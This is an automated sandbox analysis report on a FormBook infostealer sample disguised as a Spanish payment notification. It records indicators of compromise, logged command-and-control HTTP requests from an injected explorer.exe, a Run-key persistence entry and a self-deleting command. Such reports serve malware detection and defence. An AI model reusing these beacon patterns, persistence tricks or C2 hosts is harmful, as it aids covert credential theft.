                                            http://www.jiyu-kobo.co.jp/~mQNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/MmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comsiefNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.25 | theguiriguide.com | United States | 2635 | AUTOMATTICUS | true
198.54.117.212 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
104.195.7.239 | www.librevillegabon.com | United States | 22552 | ESITEDUS | true
                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:626150
                                            Start date and time: 13/05/202216:43:472022-05-13 16:43:47 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 52s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:Notificaci#U00f3n de pago.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode: default
                                            Analysis stop reason: Timeout
                                            Detection: MAL
                                            Classification: mal100.troj.evad.winEXE@7/1@6/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 22.1% (good quality ratio 19.8%)
                                            • Quality average: 70.8%
                                            • Quality standard deviation: 32.4%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 117
                                            • Number of non-executed functions: 132
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 40.125.122.176, 52.152.110.14, 20.223.24.244, 52.242.101.226
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                            • Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            Time | Type | Description
                                            16:45:11 | API Interceptor | 1x Sleep call for process: Notificaci#U00f3n de pago.exe modified
                                            16:47:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run D8ILG6RHT8 C:\Program Files (x86)\Qmx6\xhl42jqfp00z.exe
                                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                            No context
                                            No context
                                            Process: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            File Type: ASCII text, with CRLF line terminators
                                            Category: dropped
                                            Size (bytes): 1308
                                            Entropy (8bit): 5.345811588615766
                                            Encrypted: false
                                            SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                            MD5: EA78C102145ED608EF0E407B978AF339
                                            SHA1: 66C9179ED9675B9271A97AB1FC878077E09AB731
                                            SHA-256: 8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                            SHA-512: 8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                            Malicious: true
                                            Reputation: moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                            File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit): 7.9124952245387155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name: Notificaci#U00f3n de pago.exe
                                            File size: 535552
                                            MD5: 297e8b7f26a2eb1af366cac0202eca9a
                                            SHA1: 4b3e36dcd7ea9785f93e43699e1224ad30626148
                                            SHA256: 441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
                                            SHA512: bd53b63f91ecdc33e6dba2929dbe1039df08bc8a84950af9fb2b34fe803c3d61fc09c40ae8843d961e4107e6970690e2ff4d7436ff1d78b7e5aa0b4c87576942
                                            SSDEEP: 12288:3GuFJoO8gHHV3PnS2l3wCGeoPzaHkkzXlWaVaGNtl7:rwyHHRS2tPweEkzXRVJ
                                            TLSH: 4DB41256A267A933C14A9736CCD855CC5330CF06AC23DA4768E932CC2B73BC64E91B67
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.|b..............0.."..........^A... ...`....@.. ....................................@................................
                                            Icon Hash: 00828e8e8686b000
                                            Entrypoint: 0x48415e
                                            Entrypoint Section: .text
                                            Digitally signed: false
                                            Imagebase: 0x400000
                                            Subsystem: windows gui
                                            Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp: 0x627CAF6D [Thu May 12 06:55:41 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version: v4.0.30319
                                            OS Version Major: 4
                                            OS Version Minor: 0
                                            File Version Major: 4
                                            File Version Minor: 0
                                            Subsystem Version Major: 4
                                            Subsystem Version Minor: 0
                                            Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84110 | 0x4b | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x86000 | 0x5e0 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x840c3 | 0x1c | .text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0x82164 | 0x82200 | False | 0.939192333093 | data | 7.92135270708 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x86000 | 0x5e0 | 0x600 | False | 0.429036458333 | data | 4.15748129845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x88000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                                         Language  Country
RT_VERSION   0x860a0  0x354  data
RT_MANIFEST  0x863f4  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

DLL          Import
mscoree.dll  _CorExeMain

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2013
Assembly Version  0.0.1.0
InternalName      FormatExcept.exe
FileVersion       0.0.1.0
CompanyName
LegalTrademarks
Comments
ProductName       PagedOptionsDialog
ProductVersion    0.0.1.0
FileDescription   PagedOptionsDialog
OriginalFilename  FormatExcept.exe

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
May 13, 2022 16:46:41.058917999 CEST  192.168.2.3  8.8.8.8  0xfaa7    Standard query (0)  www.evertribute.com      A (IP address)  IN (0x0001)
May 13, 2022 16:46:46.489698887 CEST  192.168.2.3  8.8.8.8  0x7032    Standard query (0)  www.theguiriguide.com    A (IP address)  IN (0x0001)
May 13, 2022 16:46:51.974284887 CEST  192.168.2.3  8.8.8.8  0x6a9a    Standard query (0)  www.team-ctctitleco.com  A (IP address)  IN (0x0001)
May 13, 2022 16:46:57.120481968 CEST  192.168.2.3  8.8.8.8  0x1c73    Standard query (0)  www.librevillegabon.com  A (IP address)  IN (0x0001)
May 13, 2022 16:47:02.828375101 CEST  192.168.2.3  8.8.8.8  0xe13c    Standard query (0)  www.triptoasiam.com      A (IP address)  IN (0x0001)
May 13, 2022 16:47:10.203502893 CEST  192.168.2.3  8.8.8.8  0x1b3     Standard query (0)  www.massage-rino.com     A (IP address)  IN (0x0001)

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code      Name                       CName                      Address         Type                    Class
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    www.evertribute.com        parkingpage.namecheap.com                  CNAME (Canonical name)  IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.212  A (IP address)          IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.217  A (IP address)          IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.211  A (IP address)          IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.216  A (IP address)          IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.210  A (IP address)          IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.218  A (IP address)          IN (0x0001)
May 13, 2022 16:46:41.080055952 CEST  8.8.8.8    192.168.2.3  0xfaa7    No error (0)    parkingpage.namecheap.com                             198.54.117.215  A (IP address)          IN (0x0001)
May 13, 2022 16:46:46.515434027 CEST  8.8.8.8    192.168.2.3  0x7032    No error (0)    www.theguiriguide.com      theguiriguide.com                          CNAME (Canonical name)  IN (0x0001)
May 13, 2022 16:46:46.515434027 CEST  8.8.8.8    192.168.2.3  0x7032    No error (0)    theguiriguide.com                                     192.0.78.25     A (IP address)          IN (0x0001)
May 13, 2022 16:46:46.515434027 CEST  8.8.8.8    192.168.2.3  0x7032    No error (0)    theguiriguide.com                                     192.0.78.24     A (IP address)          IN (0x0001)
May 13, 2022 16:46:52.015516996 CEST  8.8.8.8    192.168.2.3  0x6a9a    Name error (3)  www.team-ctctitleco.com    none                       none            A (IP address)          IN (0x0001)
May 13, 2022 16:46:57.438465118 CEST  8.8.8.8    192.168.2.3  0x1c73    No error (0)    www.librevillegabon.com                               104.195.7.239   A (IP address)          IN (0x0001)
May 13, 2022 16:47:02.958780050 CEST  8.8.8.8    192.168.2.3  0xe13c    No error (0)    www.triptoasiam.com                                   162.0.216.71    A (IP address)          IN (0x0001)
May 13, 2022 16:47:10.370362997 CEST  8.8.8.8    192.168.2.3  0x1b3     No error (0)    www.massage-rino.com                                  38.40.251.97    A (IP address)          IN (0x0001)

                                            • www.evertribute.com
                                            • www.theguiriguide.com
                                            • www.librevillegabon.com

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49760        198.54.117.212  80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
May 13, 2022 16:46:41.271711111 CEST  8613                OUT        GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.evertribute.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.3  49761        192.0.78.25     80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
May 13, 2022 16:46:46.539707899 CEST  8614                OUT        GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.theguiriguide.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
May 13, 2022 16:46:46.708456039 CEST  8614                IN         HTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Fri, 13 May 2022 14:46:46 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb
                                            X-ac: 2.hhn _dfw
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.3  49764        104.195.7.239   80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
May 13, 2022 16:46:57.630451918 CEST  9314                OUT        GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.librevillegabon.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
May 13, 2022 16:46:57.818396091 CEST  9314                IN         HTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 13 May 2022 14:46:58 GMT
                                            Connection: close


                                            Target ID:0
                                            Start time:16:44:56
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xb90000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Target ID:8
                                            Start time:16:45:17
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Imagebase:0xe10000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Target ID:11
                                            Start time:16:45:22
                                            Start date:13/05/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6b8cf0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Target ID:14
                                            Start time:16:45:52
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\WWAHost.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                            Imagebase:0x1120000
                                            File size:829856 bytes
                                            MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Target ID:15
                                            Start time:16:45:57
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xc20000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:16
                                            Start time:16:45:58
                                            Start date:13/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7c9170000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high


                                              Execution Graph

                                              Execution Coverage:12.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:93
                                              Total number of Limit Nodes:5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 27e057f15b1302d49affe0cbb93c0974b3eba9aa89076c71b7047fa1f6e1f783
                                              • Instruction ID: b0822131f9d91a702866e906049d4fd6308100a4fee1eb8b3af4feb1cfdc12a8
                                              • Opcode Fuzzy Hash: 27e057f15b1302d49affe0cbb93c0974b3eba9aa89076c71b7047fa1f6e1f783
                                              • Instruction Fuzzy Hash: D07250B0A001199FCB14DF69C884AAEBBB2BF89304F158169E907EB356DB30DD51CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e5e9ae1726a0a09963e23bb0dd035ff91fc727ac92e8f071fb14ba5f02c901a
                                              • Instruction ID: 653c1305d72e361ccc2805439158d3237422cc6dda1fc00676c151e13112b10e
                                              • Opcode Fuzzy Hash: 8e5e9ae1726a0a09963e23bb0dd035ff91fc727ac92e8f071fb14ba5f02c901a
                                              • Instruction Fuzzy Hash: B4824BB4A1420AEFCB14CF68C584AAEBBF2BF48304F198559E9169B3A1D730ED45CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
